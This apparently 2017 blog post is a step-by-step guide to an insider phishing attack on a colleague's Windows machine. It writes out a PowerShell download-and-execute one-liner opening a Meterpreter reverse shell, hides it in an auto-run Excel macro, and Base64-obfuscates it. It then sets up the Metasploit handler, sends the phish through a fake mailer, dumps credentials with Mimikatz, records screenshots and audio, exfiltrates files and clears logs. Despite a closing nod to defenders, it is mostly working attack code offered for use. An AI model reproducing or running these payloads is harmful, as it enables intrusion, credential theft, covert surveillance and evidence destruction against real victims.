Dec 20, 2017
Technical Guide for Insider Cyber Attacks
Danger can be at home
Attack Description
Possible Attack scenarios:
- Insider employee who wants exfiltrate business data for reselling it
- Competitor who wants another company to look rubbish
- Consultant who wants sneak into the corporate network for malicious purposes
- …for the glory
Attack scope:
- Open a reverse shell on a target machine bypassing standard Anti-malware solutions using in-memory powershell scripts
- In-memory powershell Remote command execution
- Dump credentials, take screenshots, register audio, etc…
Possible Attack vectors:
- Targeted Phishing email that delivers malicious document with embedded macro
- Rubber Ducky with predefined autorun PS malicious scripts
- Exchange files between insider and victim colleague
- Any method that can execute code on the victim’s machine…
In this article i will use phishing email as an example.
STEP 1: Code writing
Create CMD command string to execute on target PC:
- powershell.exe → run the PowerShell on victim machine (working also with user privileges)
- IEX (New-Object Net.WebClient) → run a local Internet Explorer instance in order to bypass proxy authentication
- DownloadString(‘https://HOSTING_SITE/Shellcode.ps1'); → download PS script from remote host
- Invoke-Shellcode → invoke the script execution on local machine directly in memory in order to bypass the AV solutions
- -Payload windows/meterpreter/reverse_https → set the payload that you want to use
- -Lhost x.x.x.x → set attacker’s IP machine
- -Lport 443 → set port where the victim machine will try to contact the attacker machine. Set the 443 in order to bypass internal FW.
- -Force → declare “I know what I’m doing, and I’m sure I want to do this”
During this attack demonstration i downloaded the script directly from Powerspolit Github repository in order to avoid network detection (you can also expose the script directly on your Kali Linux in order to ensure the communication without exit on internet) . So the complete command that will be execute on victim machine is the following:
powershell.exe “IEX (New-ObjectNet.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/2153a0a0b05ce5cdacceefeefe46b30f20caf3db/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force”
STEP 2: Malicious Macro Code writing
In this step you need to include the previous script into a VBA Macro Excel Document:
- Sub Auto_Open() → Run a macro when Excel starts
- Call Shell(“cmd.exe → Run local CMD
- /c powershell.exe → Run command to launch PowerShell
- -noexit → prevent the PowerShell console window from closing
- “IEX (New-Object…” → Previously created commands
- vbHide → Hide the Command Window when executing command
- End Sub → Exit Statement
So the complete VBA macro that you need to insert into a Excel is the following:
Sub Auto_Open()
Call Shell(“cmd.exe /c powershell.exe -noexit “”IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/2153a0a0b05ce5cdacceefeefe46b30f20caf3db/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force”””, vbHide)
End Sub
An example of the malicious excel:
Virus Total Detection at day 0:
Hybrid-analysis:
Any.Run Interactive Malware Analysis:
Despite this malware has a simple structure and the code clearly highlights his malicious behavior, the detection ratio at day 0 is very low. This highlights the first real security problem concerning all vendors that are focused only on signatures for their detection.
STEP 3: Simple Code Obfuscation (OPTIONAL)
You can encode the command text in simple ways:
Encoding powershell script in Base64:
$command=”IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/2153a0a0b05ce5cdacceefeefe46b30f20caf3db/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force”
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
$encodedCommand >> output.txt
Example of encoded command to execute:
powershell -ExecutionPolicy Bypass -encodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAB[…]=
You can also protect the VBA script with a password in order to avoid first investigation detection:
STEP 4: Configure KALI Linux
Because this is an insider attack you can configure a live Kali Linux or install it using a VM. The goal is to run the code on the victim machine without leaving traces of the attacking machine, so choose the method you prefer for it.
I suggest you to use a preconfigured Virtual Kali Linux that you can delete immediately when occur.
Following the easy msfconsole configuration steps:
msfconsole
use exploit/multi/handler/
set Payload windows/meterpreter/reverse_https
set LHOST x.x.x.x
set LPORT 443
exploit
Remember that if you want to successfully complete this attack without detection event you must only use these specific commands. If you try to use for example InitialAutoRunScript “migrate -f” or other scripts the AVs could be detect them.
STEP 5: OSINT Reconnaissance (OPTIONAL)
If you know everything about your target you can skip this step.
In other cases like phishing attack you will have to find the most suitable victim to receive the email or understand something more about the target.
In this example i show you how you can use a public tool named hunter.io to perform reconnaissance phase. On github and on the internet there many different tools that can help you in this phase.
Kaspersky Domain example results via Hunter.io tool:
Link of the tool: https://hunter.io/search
STEP 6: Send Malicious Email via fake online mailer
In order to send the malicious email without configure a mail server and expose yourself unnecessarily, I suggest to use an online fake mailer. On the internet there are many possibilities that you can use. Here you can find some examples:
According to the mailer used, the antispam services (in base reputation or other indicators) will block or let the email pass. I advise you to do some tests before proceeding in order to find the ideal mailer for your target.
link to the most famous fake mailer: https://emkei.cz/
Creating phishing email:
STEP 7: Victim receives the email
Online Outlook mail visualization example:
STEP 8: Waiting
At this point you just have to wait until:
- User clicks on “enable content”
- Macro runs the malicious code silently
- Session will be opened
Here we are:
STEP 9: Actions on objective
Following you can find some examples of malicious command execution on Windows machines. During last days I had the opportunity to test different enterprise and home antivirus solutions which, except one, have miserably failed to detect and block the following types of advanced in-memory attacks.
Subsequently, the same tests were performed using ATP (advanced threat protection) and EDR (endpoint detection and response) technologies of the various enterprise solutions. Thanks to these integrations it was possible to detect or block all or only some of described attacks.
Write me if you need more details…
…Let’s start with the attacks:
Obtain Windows shell:
Take screenshots at a regular interval and saves them to disk using in memory powershell script
powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-TimedScreenshot.ps1'); Get-TimedScreenshot -Path c:\windows\temp\ -Interval 30 -EndTime 18:00”
Following you can find the screenshot saved on specified folder:
Record audio from the microphone using Windows API and save the output to a file on disk
powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-MicrophoneAudio.ps1'); Get-MicrophoneAudio -Path c:\windows\temp\secret.wav -Length 10 -Alias “SECRET”
Dump Credentials using in-memory powershell scripts
Standard Mimikatz toolthat dump credentials without writing mimikatz binary to disk.
powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds”
Mimikatz needs to be granted administrative privileges on victim machine. If you don’t want to use privilege escalation mechanisms you can use other scripts like:
WCMDump: PowerShell script to dump Windows credentials from the Credential Manager
powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1'); Invoke-WCMDump”
Get Browser Data
Enumerates browser history and bookmarks for a Chrome, Internet Explorer, and/or Firefox browsers on Windows machines:
powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Get-BrowserData.ps1'); Get-BrowserData”
Data Exfiltration — Download files
After executing malicious commands and saving the different outputs on the victim filesystem, you can download them using simple command directly from meterpreter:
meterpreter > download <file name>
using this method is possibile to download sensitive data from victim machine like business documents or personal information.
STEP 10: Erase the traces
There are many tricks in order to delete tracks of this activity. Here a simple list:
- Using clearev meterpreter command is it possible to clear the Application, System, and Security logs on a Windows system
- Disconnect Kali Linux
- Safe the output file on a encrypted USB
- Delete the VM image from disk
- Wipe physical disk
Conclusion
PowerShell allows attackers to perform malicious actions without deploying any additional binary files, increasing the chances of spreading their threats further without being detected. The fact that PowerShell is installed by default makes the framework a favored attack tool.
With this attacks I showed you how is simple to compromise a machine and bypass the standard security measures that are normally used in large companies. I hope this demonstration can help all security vendors to increase their detection capabilities and all companies to realize that the “standard” security solutions used to date are not enough to detect these advanced attacks.
Could next-generation AVs be the solution? Surely it’s a way that must be evaluated!
Follow me on Twitter:
